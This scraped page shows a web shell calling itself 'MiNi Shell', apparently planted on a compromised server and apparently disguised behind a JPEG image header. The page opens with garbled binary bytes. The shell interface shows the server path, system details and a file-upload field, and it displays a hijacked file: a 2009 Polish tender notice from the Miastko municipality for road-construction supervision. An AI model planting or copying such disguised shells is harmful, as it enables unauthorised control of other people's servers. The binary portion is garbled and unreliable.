JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70627-N-2009.html

<p class="kh_header"><b>Miastko: Pełnienie funkcji  nadzoru inwestorskiego na zadaniu p.n.: Budowa chodnika wraz z przebudową drogi w m. Pasieka w km 0+496,00 do km 1+555,75 w ramach dokumentacji projektowej pn. Przebudowa ulicy Kujawskiej, gm. Miastko,  pow. bytowski, woj. pomorskie.</b><br>
<b>Numer ogłoszenia: 70627 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji  nadzoru inwestorskiego na zadaniu p.n.: Budowa chodnika wraz z przebudową drogi w m. Pasieka w km 0+496,00 do km 1+555,75 w ramach dokumentacji projektowej pn. Przebudowa ulicy Kujawskiej, gm. Miastko,  pow. bytowski, woj. pomorskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi polegającej na pełnieniu funkcji nadzoru inwestorskiego w zakresie zarządzania, kontrolowania i nadzorowania robót budowlanych związanych z realizacja zamówienia publicznego pn.:Budowa chodnika wraz z przebudową drogi w m. Pasieka w km 0+496,00 do km 1+555,75 w ramach dokumentacji projektowej pn. Przebudowa ulicy Kujawskiej, gm. Miastko,  pow. bytowski, woj. pomorskie - obejmującego wykonanie w szczególności następującego zakresu rzeczowego robót: 
1)  nawierzchni z kostki brukowej betonowej grubości 6 cm na podsypce cementowo - piaskowej (chodniki): kolor szary - pow. 2035,36 m2, czerwony - pow. 508,84 m2; 
2) nawierzchni z kostki brukowej betonowej grubości 8 cm na podsypce cementowo - piaskowej (wjazdy) kolor czarny - pow. 319,60 m2;
3) nawierzchni z kostki brukowej betonowej grubości 8 cm na podsypce cementowo - piaskowej (jezdnia) kolor szary - pow. 2568,25 m2 ;
4) nawierzchnia z mieszanek mineralno - bitumicznych asfaltowych ( warstwy: wiążące, ścieralne) pow. 2733,50  m2;
5) krawężniki betonowe  o wymiarach 15x30 cm - długość 1662,50 m;
6) obrzeża betonowe o wymiarach 30x8 cm - długość 1070,0 m;
7) usunięcie kolizji branżowych (teletechnicznych);
8) budowa oświetlenia ulicznego - montaż 10 punktów świetlnych;
9) wykonanie oznakowania pionowego - 14 szt.;
10) rozebranie istniejącej nawierzchni;
11) profilowanie, humusowanie i obsianie skarp.

Wartość netto w/w robót budowlanych stanowiących przedmiot nadzoru inwestorskiego określonego na podstawie dokonanego wyboru najkorzystniejszej oferty - 1 005 816,45 PLN (słownie: jeden milion pięć tysięcy osiemset szesnaście złotych 45/100).

1.3.1. Zakres rzeczowy przedmiotu zamówienia:
Świadczenia usługi polegającej na pełnieniu przez wykonawcę funkcji nadzoru inwestorskiego obejmuje następujący zakres czynności:
1.3.1.1. zapoznanie się z całą dokumentacją formalną-prawną jaka obowiązuje strony - odpowiednio Zamawiający, Inspektor nadzoru, Wykonawca robót,  od początku realizacji inwestycji do chwili jej rozliczenia;
1.3.1.2. organizacja i udział w przekazaniu terenu budowy (sporządzenie protokółu) Wykonawcy robót budowlanych;
1.3.1.3. organizowanie i prowadzenie spotkań koordynacyjnych - nie mniej niż  jeden raz na dwa tygodnie;
1.3.1.4. prowadzenie nadzoru inwestorskiego  w branży drogowej, elektrycznej zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz. U. z 2003r. Nr 207, poz. 2016 z  późn. zm.);
1.3.1.5. kontrola  zgodności realizacji robót budowlanych  z  specyfikacją istotnych warunków zamówienia,    projektem budowlanym, treścią oferty Wykonawcy robót budowlanych i  zawartą z nim umową;
1.3.1.6. koordynacja realizacji poszczególnych robót;
1.3.1.7. weryfikowanie, aktualizowanie i sporządzanie  harmonogramów rzeczowo-finansowych;
1.3.1.8. sporządzanie, w razie potrzeby, protokołów konieczności dotyczących robót dodatkowych,  zamiennych  oraz przedkładanie ich Zamawiającemu do akceptacji przed ich realizacją;
1.3.1.9. ewidencjonowanie kosztów inwestycji i ich rozliczenie z Zamawiającym w okresach miesięcznych;
1.3.1.10. przygotowanie i przedstawianie comiesięcznych sprawozdań z postępu robót i realizacji planowanych nakładów finansowych;
1.3.1.11. opracowanie oraz przekazanie Zamawiającemu niezbędnych dokumentów do uruchamiania finansowania inwestycji, a w szczególności przygotowanie wniosku o płatność;
1.3.1.12. sprawdzanie szczegółowych kalkulacji, kosztorysów powykonawczych, faktur wraz z załączonymi dokumentami przedstawionych przez wykonawców, dostawców i usługobiorców oraz uzgadnianie wydatków i kosztów realizowanej inwestycji;
1.3.1.13. spowodowanie , w razie potrzeby, naniesienia zmian w dokumentacji projektowej i przekazanie Zamawiającemu dokumentacji powykonawczej;
1.3.1.14. przygotowanie i dokonywanie odbiorów robót ulegających zakryciu, zanikowych, odbiorów częściowych robót oraz odbioru końcowego zgodnie z warunkami określonymi w umowie z Wykonawcą robót i w innych dokumentach kontraktu; 
1.3.1.15. dokonywanie w uzgodnieniu z Zamawiającym zmian wynikłych w trakcie realizacji robót;
1.3.1.16. opracowanie opinii dotyczących wad przedmiotu umowy, uznanych za nie nadających się do ich usunięcia oraz wnioskowanie o obniżenie wynagrodzenia wykonawcom z określeniem i utraty wartości robót i kwot obniżonego wynagrodzenia za te roboty;
1.3.1.17. zawiadamianie wykonawców o stwierdzonych wadach w ich robotach w okresie rękojmi;
1.3.1.18. sporządzanie wniosków o zapłatę kar umownych za zwłokę w realizacji inwestycji przez  wykonawcę oraz za zwłokę w usunięciu usterek stwierdzonych przy odbiorze robót;
1.3.1.19. opracowanie i dostarczenie Zamawiającemu ostatecznego rozliczenia zrealizowanej i odebranej inwestycji  w terminie do 30 dni od terminu odbioru końcowego inwestycji;
1.3.1.20. zgłoszenie zrealizowanej inwestycji do użytkowania;
1.3.1.21. uczestniczenie w czynnościach kontrolnych sprawowanych przez organ nadzoru budowlanego;
1.3.1.22. udział w pracach komisji związanych z przeglądami gwarancyjnymi;
1.3.1.23. udział w przeglądach pogwarancyjnych i sporządzanie protokołów pogwarancyjnych;
1.3.1.24. zawiadamianie Wykonawców o stwierdzonych wadach w ich robotach w okresie rękojmi;
1.3.1.25. spowodowanie zastępczego usunięcia w okresie rękojmi wad i usterek na koszt wykonawców;

1.3.2. Wymogi realizacji (wykonania) przedmiotu zamówienia
1.3.2.1 Wykonawca - Inspektor nadzoru  zobowiązany jest do pełnienia funkcji nadzoru inwestorskiego zgodnie z wymaganiami wynikającymi z dokumentów kontraktowych i  obowiązujących przepisów odnoszących się do przedmiotu zamówienia w zakresie realizacji robót budowlanych, stosowania materiałów i urządzeń, prowadzenie nadzoru inwestorskiego  (inspektora nadzoru) w branży drogowej, elektrycznej zawartych m.in. w  ustawie z dnia 7 lipca 1994 r. - Prawo budowlane (t.j. Dz. U. z 2003r. Nr207, poz. 2016 z  późn. zm.) i innych.
1.3.2.2. Wykonawca (Inspektor nadzoru) zobowiązany jest do obecności na budowie co najmniej dwa razy w tygodniu. Ponadto zobowiązany jest do przybycia na teren budowy na każde żądanie Zamawiającego w sytuacji, w której  jego nieobecność grozi Zamawiającemu poniesieniem szkody, lub innymi sankcjami związanymi z przebiegiem realizacji robót. W takim przypadku przybycie musi nastąpić w dniu  zgłoszenia takiej konieczności.
1.3.2.3. Częstotliwość inspekcji robót musi zabezpieczać jakość ich wykonania i umożliwiać Wykonawcy postęp robót zgodnie z przyjętym harmonogramem.  W przypadku prowadzenia robót  w strefach podwyższonego zagrożenia  obecność Inspektor nadzoru powinna być adekwatna do stopnia ewentualnego zagrożenia.
1.3.2.4. Inspektor nadzoru ma obowiązek odpowiednio wcześniejszego reagowania (zawiadamiania Zamawiającego)  o zagrożeniach terminów realizacyjnych przyjętych w harmonogramie.
1.3.2.5. Wszelkie polecenia, decyzje, uwagi muszą być bezwzględnie wydawane na piśmie (wpisem w dzienniku budowy).
1.3.2.6. W przypadku nie wywiązywania się określonych osób z  nałożonych obowiązków  dotyczących sprawowania  nadzoru inwestorskiego, a także w przypadku złej współpracy z  Zamawiającym i Wykonawcą, Zamawiający  jest uprawniony  do żądania zmiany osoby, której to dotyczy, a Inspektor Nadzoru (jako Wykonawca) to żądanie musi spełnić. W przypadku odmowy spełnienia takiego żądania, Zamawiający po określonej na piśmie dacie wzywającej do zaprzestania sprawowania  nadzoru inwestorskiego ( dla danej branży) jest uprawniony do wyznaczenia takiej osoby w własnym zakresie, a wynagrodzenie brutto przysługujące tej osobie będzie potrącane z faktur wystawianych przez Inspektor nadzoru za świadczenie jego funkcji.   
1.3.2.7. Jeżeli z  przyczyn nie nazwanych na etapie prowadzonego postępowania, termin ostatecznego finansowego rozliczenia projektu ulegnie przedłużeniu to fakt ten nie zwalnia Inspektora nadzoru z  obowiązku  ostatecznego finansowego rozliczenia projektu pod rygorem odmowy określonej części wynagrodzenia, równoważnej wysokości wynagrodzenia za zlecenie  dokonania przedmiotowego rozliczenia osobom trzecim. 
1.3.2.8. Zagwarantowanie przedłużenia obowiązku wykonywania czynności określonych w poz. 1.3.1.22. do poz. 1.3.1.25 na okres objęty gwarancją udzieloną przez  wykonawcę  robót budowlanych, bez dodatkowego wynagrodzenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.41.00-8, 74.31.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Na podstawie  art. 45 ust. 2  Pzp  Zamawiający żąda od Wykonawców ubiegających się o udzielenie   zamówienia  wniesienia wadium w  kwocie 2.000,00 PLN  (słownie: dwa tysiące złotych 00/100). Wykonawca ubiegający się o udzielenie zamówienia  zobowiązany jest do wniesienia wadium przed  upływem terminu składania ofert tj. do dnia 13 maja 2009r. do godz. 12:00.
Wadium  może być wnoszone w jednej lub kilku następujących formach: 
1) w pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym;
3) gwarancjach bankowych;  
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w pieniądzu musi być wpłacone  przelewem na rachunek bankowy Zamawiającego -   PKO BP  O/Miastko,  nr  97 1020 4708 0000 7102 0004 4362. Wniesione w ten sposób wadium będzie skuteczne jeżeli w podanym terminie tj. do dnia 13 maja 2009r. do godz. 12:00.  znajdzie się na rachunku bankowym Zamawiającego.
Uwaga: Niedopuszczalna jest forma gotówkowej wpłaty w kasie Urzędu  Miejskiego w Miastku.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2.1  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  wykażą, że spełniają następujące warunki wywodzące się z  art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( t.j. Dz. U. z 2007r., Nr 223, poz. 1655 z poźn. zm.) określone w  niniejszej  Specyfikacji Istotnych Warunków Zamówienia tj.:
2.1.1. posiadają uprawnienia do wykonywania działalności gospodarczej w zakresie upoważniającym wykonawcę do ubiegania się o udzielenie i  realizację zamówienia będącego przedmiotem niniejszego postępowania;
2.1.2. posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia tj.: w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali (zakończyli) jako Wykonawca lub Podwykonawca co najmniej jedną usługę polegającą na pełnieniu funkcji nadzoru inwestorskiego budowy, przebudowy dróg publicznych utwardzonych o wartości nadzorowanych robót budowlanych nie mniejszej niż 900.000,00 PLN netto w ramach jednej umowy;
2.1.3. dysponują potencjałem technicznym niezbędnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów o jego udostępnieniu - wymagania minimalne:
- środek transportu - pozostający do dyspozycji osób planowanych do realizacji niniejszego zamówienia pozwalający na świadczenie usługi na zasadach określonych w SIWZ  -  1 szt.;
2.1.4. dysponują osobami zdolnymi  do wykonania zamówienia, legitymującymi się stażem zawodowym w pełnieniu samodzielnych funkcji w budownictwie nie krótszym niż 5 lat, posiadającymi stosowne uprawnienia budowlane w zakresie:
1) budowy dróg  - 1 osoba;
2) branży elektrycznej -1 osoba;
będącymi członkami Okręgowej Izby Inżynierów Budownictwa zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów, lub przedstawią pisemne zobowiązanie innych podmiotów do ich udostępnienia.
2.1.5. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:posiadają dostęp lub dysponują  środkami finansowymi   umożliwiającymi realizację zamówienia.
2.1.6. nie podlegają wykluczeniu z ubiegania się o zamówienie publiczne na podstawie art. 24  ust. 1 i 2 Pzp.;
2.1.7. zgodnie z art. 44 Pzp złożą oświadczenie o spełnianiu warunków udziału w postępowaniu i żądane dokumenty potwierdzające spełnianie tych warunków.

2.2. Spełnianie warunków Wykonawców wspólnie ubiegających  się o udzielenie  zamówienia.
2.2.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art. 23 ustawy Pzp. (np. na podstawie umowy konsorcjalnej) warunki wymienione w pkt. 2.0. muszą spełniać w sposób 
następujący:
1)  określone w poz. 2.1.1.; 2.1.2.; 2.1.3.; 2.1.4.; 2.1.5.; 2.1.7. muszą być spełnione łącznie;
2)  określone w poz. 2.1.6. muszą być spełnione przez każdego z wykonawców oddzielnie.

2.3. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
2.3.1. ocena spełniania przez Wykonawców w/w wymaganych warunków będzie dokonana zgodnie z formułą -spełnia/nie spełnia- w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i załączonych do oferty. Z treści tych dokumentów lub oświadczeń musi jednoznacznie wynikać, że w/w warunki Wykonawca spełnia; 
2.3.2. na podstawie art. 26 ust. 3 Pzp Zamawiający wezwie Wykonawców, którzy w określonym terminie  nie złożyli wymaganych dokumentów lub oświadczeń (lub złożone zawierają błędy), o których mowa w  części 8.0. siwz lub nie złożyli pełnomocnictw (lub złożone są wadliwe) do ich złożenia w wyznaczonym terminie;
2.3.3. w przypadku braku odpowiedzi na wezwanie, o którym mowa w poz. 2.3.2. na podstawie przesłanek wynikających z art. 46 ust. 4a Pzp Zamawiający zatrzyma wadium Wykonawcy wraz z odsetkami.
2.3.4. nie spełnienie chociażby jednego z w/w warunków oraz brak uzupełnienia dokumentów lub oświadczeń zgodnie z wezwaniem Zamawiającego spowoduje wykluczenie Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą;
2.3.5. Zamawiający  dokona wyboru najkorzystniejszej oferty spośród  ofert ważnych i nie  podlegających odrzuceniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3.1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu wymienionych w części 2.1. oraz formalnej poprawności oferty Wykonawca zobowiązany jest dołączyć do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę następujące dokumenty lub oświadczenia: 
3.1.1. aktualny  odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności  gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3.1.2. wykaz wykonanych usług  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, zawierający nie mniej niż jedną usługę polegającą na pełnieniu funkcji nadzoru inwestorskiego budowy, przebudowy dróg publicznych utwardzonych o wartości nadzorowanych robót budowlanych nie mniejszej niż 900.000,00 PLN w ramach jednej umowy
3.1.3. dokumenty potwierdzające należyte wykonanie usługi zamieszczonej w wykazie wymienionym w poz. 2.1.2 siwz wystawione przez Zamawiających, u których wymienione usługi zostały wykonane, za dokumenty te można przyjąć: referencje, rekomendacje, listy polecające oraz inne dokumenty, z których treści wynika, iż zamieszczone w wykazie usługi  wykonano należycie;
3.1.4 wykaz potencjału technicznego niezbędnego do wykonania zamówienia (narzędzi i urządzeń) jakimi dysponuje Wykonawca
Uwaga: W przypadku gdy Wykonawca wskaże w wykazie urządzenia, którymi będzie dysponował (jako udostępnione) musi dołączyć zobowiązanie innych podmiotów do ich  udostępnienia;
3.1.5. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia
Uwaga: W przypadku gdy Wykonawca wskaże w wykazie osoby, którymi będzie dysponował (jako udostępnionych) musi dołączyć zobowiązanie innych podmiotów do ich  udostępnienia;
3.1.6. dokumenty stwierdzające, że osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia dla osób przewidzianych do pełnienia samodzielnych funkcji technicznych, o których  mowa w  rozdziale II -  samodzielne funkcje techniczne w budownictwie ustawy z dnia 7 lipca 1994r. (t.j. Dz. U. z 2003r. Nr 2007, poz.2016 z późn. zm.)  w zakresie: branży drogowej, elektrycznej wraz z  aktualnymi na dzień składania ofert zaświadczeniami o członkostwie w Izbie Inżynierów Budownictwa.;
3.1.7. oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust.1 i ust. 2 Pzp 
3.1.8. oświadczenie Wykonawcy stosownie do art. 44 Pzp o spełnianiu warunków udziału w postępowaniu   wynikających z art. 22 ust. 1 Pzp 

3.2. Informacja o pozostałych dokumentach, które Wykonawca zobowiązany jest załączyć do  oferty:
3.2.1. dowód wniesienia wadium:
1) jeżeli wniesiono w pieniądzu - do oferty zaleca się dołączyć dowód zrealizowania przelewu w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;
2) jeżeli wniesiono w innej dopuszczalnej formie - do oferty należy dołączyć oryginał właściwego dokumentu;
3.2.2. pełnomocnictwo osób/y uprawnionej do reprezentowania firmy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy  organizacyjnej firmy Wykonawcy o ile nie wynika to z innych dokumentów  załączonych do oferty; 
3.2.3. dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich (podpisany przez wszystkich wykonawców) - w formie oryginału, w przypadku wyboru oferty tych Wykonawców, Zamawiający przed zawarciem umowy ws. zamówienia publicznego będzie żądał umowę regulującą ich współpracę;
3.2.4. wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć Podwykonawcom - należy zamieścić na formularzu ofertowym;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest w siedzibie zamawiającego (pokój 17, 18). Płatność 10,00 PLN (brutto) za SIWZ wyłącznie za przekazanie (przesłanie) jej w formie papierowej na wniosek wykonawcy..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 12:00, miejsce: Urząd Miejski w Miastku, 77-200 Miastko, ul. Grunwaldzka 1 pok. nr 19 (sekretariat burmistrza). Otwarcie ofert nastąpi w dniu 13 maja 2009r. godz. 12:15 pokój nr 6..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com